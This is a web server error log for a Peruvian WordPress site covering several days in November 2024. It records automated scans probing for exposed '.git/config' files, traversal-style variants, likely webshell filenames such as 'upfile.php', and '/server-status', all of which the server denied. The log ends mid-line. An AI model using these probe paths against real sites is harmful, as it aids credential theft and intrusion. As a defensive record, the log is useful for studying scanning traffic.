http://investigacionperu.com/wp-admin/js/index.php [Tue Nov 05 19:57:32.977877 2024] [autoindex:error] [pid 1905:tid 139934329468672] [client 136.144.33.189:59204] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Tue Nov 05 19:57:38.196688 2024] [autoindex:error] [pid 1296:tid 139934304290560] [client 136.144.33.189:59224] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Tue Nov 05 19:57:44.397248 2024] [:error] [pid 1297:tid 139934329468672] [client 136.144.33.189:59256] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Nov 05 19:57:55.191290 2024] [autoindex:error] [pid 1905:tid 139934295897856] [client 136.144.33.189:59304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Tue Nov 05 19:58:02.171845 2024] [autoindex:error] [pid 1297:tid 139934436493056] [client 136.144.33.189:59336] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Nov 05 19:58:14.570860 2024] [autoindex:error] [pid 1295:tid 139934203578112] [client 136.144.33.189:59376] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 19:58:18.341824 2024] [autoindex:error] [pid 1905:tid 139934220363520] [client 136.144.33.189:59388] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Tue Nov 05 19:58:20.625503 2024] [autoindex:error] [pid 1905:tid 139934444885760] [client 136.144.33.189:59398] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Tue Nov 05 19:58:21.826233 2024] [autoindex:error] [pid 1905:tid 139934419707648] [client 136.144.33.189:59402] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Tue Nov 05 19:58:22.067844 2024] [:error] [pid 1905:tid 139934195185408] [client 136.144.33.189:59404] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Nov 05 19:58:23.255985 2024] [autoindex:error] [pid 1905:tid 139934270719744] [client 136.144.33.189:59412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Tue Nov 05 19:58:31.699165 2024] [autoindex:error] [pid 1296:tid 139934186792704] [client 136.144.33.189:59442] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Nov 05 19:58:34.282976 2024] [autoindex:error] [pid 1905:tid 139934270719744] [client 136.144.33.189:59452] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Tue Nov 05 19:58:44.163435 2024] [autoindex:error] [pid 1297:tid 139934186792704] [client 136.144.33.189:59484] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Tue Nov 05 19:58:44.405144 2024] [:error] [pid 1296:tid 139934253934336] [client 136.144.33.189:59488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Nov 05 19:58:55.933610 2024] [autoindex:error] [pid 1905:tid 139934253934336] [client 136.144.33.189:59536] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Tue Nov 05 19:59:00.044738 2024] [:error] [pid 1905:tid 139934444885760] [client 136.144.33.189:59550] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Nov 05 19:59:02.425136 2024] [autoindex:error] [pid 1296:tid 139934178400000] [client 136.144.33.189:59558] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Tue Nov 05 19:59:12.371706 2024] [autoindex:error] [pid 1297:tid 139934295897856] [client 136.144.33.189:59594] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Nov 05 19:59:30.302707 2024] [:error] [pid 1295:tid 139934295897856] [client 136.144.33.189:59640] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Nov 05 19:59:33.015579 2024] [autoindex:error] [pid 1297:tid 139934220363520] [client 136.144.33.189:59646] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 19:59:37.124813 2024] [autoindex:error] [pid 1905:tid 139934220363520] [client 136.144.33.189:59656] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Tue Nov 05 19:59:45.449720 2024] [autoindex:error] [pid 1297:tid 139934312683264] [client 136.144.33.189:59676] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Tue Nov 05 20:01:20.794417 2024] [autoindex:error] [pid 1295:tid 139934295897856] [client 136.144.33.243:59832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 05 20:01:21.030453 2024] [:error] [pid 1295:tid 139934253934336] [client 136.144.33.243:59834] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Nov 05 20:57:28.700479 2024] [autoindex:error] [pid 1905:tid 139934419707648] [client 20.92.249.70:36320] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Nov 06 02:48:53.720449 2024] [authz_core:error] [pid 1905:tid 139934220363520] [client 165.22.34.189:46246] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/06 02:48:56 [error] 1258#1258: *839398 access forbidden by rule, client: 165.22.34.189, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Nov 06 03:42:40.536861 2024] [ssl:warn] [pid 25493:tid 139646938167168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 03:42:40.858602 2024] [ssl:warn] [pid 25495:tid 139646938167168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 03:42:41.430472 2024] [ssl:warn] [pid 25495:tid 139646938167168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 03:42:43.672541 2024] [ssl:warn] [pid 25495:tid 139646938167168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 03:42:46.012912 2024] [ssl:warn] [pid 25913:tid 140395696588672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 03:42:46.297764 2024] [ssl:warn] [pid 25914:tid 140395696588672] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 06 04:05:48.067367 2024] [autoindex:error] [pid 26541:tid 140395275011840] [client 4.240.116.176:47290] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/06 07:16:36 [error] 25892#25892: *843374 access forbidden by rule, client: 36.70.225.60, server: mail.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 07:16:38 [error] 25891#25891: *843375 access forbidden by rule, client: 36.70.225.60, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Wed Nov 06 10:18:18.971503 2024] [authz_core:error] [pid 26541:tid 140395249833728] [client 139.59.136.184:57826] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/11/06 10:18:23 [error] 25892#25892: *846097 access forbidden by rule, client: 139.59.136.184, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/06 11:04:56 [error] 25891#25891: *846459 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /images../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:56 [error] 25891#25891: *846460 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /static../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846461 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /events../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846462 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /media../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846463 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /img../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846464 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /js../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846465 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /css../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846466 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /api/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846467 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846468 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /config/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846469 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /backend/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846470 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /panel/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846471 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /themes/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846472 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /template/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846473 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /templates/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846474 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /views/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846475 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /layout/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846476 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /media/uploads/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846477 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /files/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846478 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /resources/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846479 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /modules/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846480 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /plugins/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846481 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /extensions/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846483 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /prestashop/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846482 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /drupal/sites/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846484 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /docs/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846485 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /documentation/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846487 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /database/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846486 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /data/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846488 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /lib/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846489 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /bower_components/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846490 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25891#25891: *846491 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /shared/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:57 [error] 25892#25892: *846492 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /common/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:58 [error] 25891#25891: *846493 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /cache/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:58 [error] 25892#25892: *846494 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /dist/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:04:58 [error] 25892#25892: *846495 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /env/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:05:06 [error] 25892#25892: *846500 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /content../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:05:06 [error] 25891#25891: *846501 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /lib../.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:05:06 [error] 25891#25891: *846502 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /scripts/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:05:06 [error] 25891#25891: *846503 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /js/libs/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 11:05:07 [error] 25891#25891: *846504 access forbidden by rule, client: 179.43.189.138, server: mail.investigacionperu.com, request: "GET /source/.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 20:20:25 [error] 25892#25892: *855173 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/06 22:02:48 [error] 25891#25891: *856527 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/11/06 22:14:40 [error] 25892#25892: *856606 access forbidden by rule, client: 44.210.83.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Nov 06 22:49:38.143377 2024] [autoindex:error] [pid 26541:tid 140395392509696] [client 4.240.53.175:47964] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 07 00:46:37.120260 2024] [autoindex:error] [pid 26541:tid 140395291797248] [client 87.120.112.131:49950] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/11/07 02:17:47 [error] 25891#25891: *859193 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Nov 07 03:46:50.800966 2024] [ssl:warn] [pid 32042:tid 139724405077888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 07 03:46:51.094114 2024] [ssl:warn] [pid 32043:tid 139724405077888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 07 03:46:51.720953 2024] [ssl:warn] [pid 32043:tid 139724405077888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 07 03:46:54.617313 2024] [ssl:warn] [pid 32043:tid 139724405077888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 07 03:46:57.020090 2024] [ssl:warn] [pid 32459:tid 139653827946368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 07 03:46:57.283189 2024] [ssl:warn] [pid 32460:tid 139653827946368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/11/07 03:54:38 [error] 32343#32343: *860106 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/11/07 06:13:09 [error] 32344#32344: *861247 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Nov 07 06:37:27.066272 2024] [:error] [pid 32479:tid 139653487232768] [client 35.181.59.85:56896] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Nov 07 06:38:06.670328 2024] [:error] [pid 584:tid 139653504018176] [client 35.181.59.85:57034] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless.php [Thu Nov 07 06:38:17.415504 2024] [:error] [pid 32477:tid 139653453661952] [client 35.181.59.85:57066] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Nov 07 06:38:23.901926 2024] [:error] [pid 32478:tid 139653420091136] [client 35.181.59.85:57100] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php 2024/11/07 08:48:20 [error] 32344#32344: *866516 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/11/07 10:05:41 [error] 32344#32344: *868545 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/07 10:30:00 [error] 32344#32344: *868976 access forbidden by rule, client: 44.210.83.24, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Thu Nov 07 12:07:09.369889 2024] [autoindex:error] [pid 32479:tid 139653462054656] [client 4.240.116.176:40792] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 07 13:07:59.174159 2024] [autoindex:error] [pid 584:tid 139653411698432] [client 20.92.249.70:41978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/11/07 13:12:08 [error] 32343#32343: *871791 access forbidden by rule, client: 44.210.83.24, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/11/07 14:35:26 [error] 32344#32344: *872987 access forbidden by rule, client: 44.210.83.24, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Nov 07 16:22:54.633284 2024] [autoindex:error] [pid 584:tid 139653403305728] [client 87.120.113.59:46372] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Nov 08 03:12:41.511361 2024] [ssl:warn] [pid 1808:tid 139656466831232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 08 03:12:41.769869 2024] [ssl:warn] [pid 1809:tid 139656466831232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 08 03:12:42.392929 2024] [ssl:warn] [pid 1809:tid 139656466831232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an 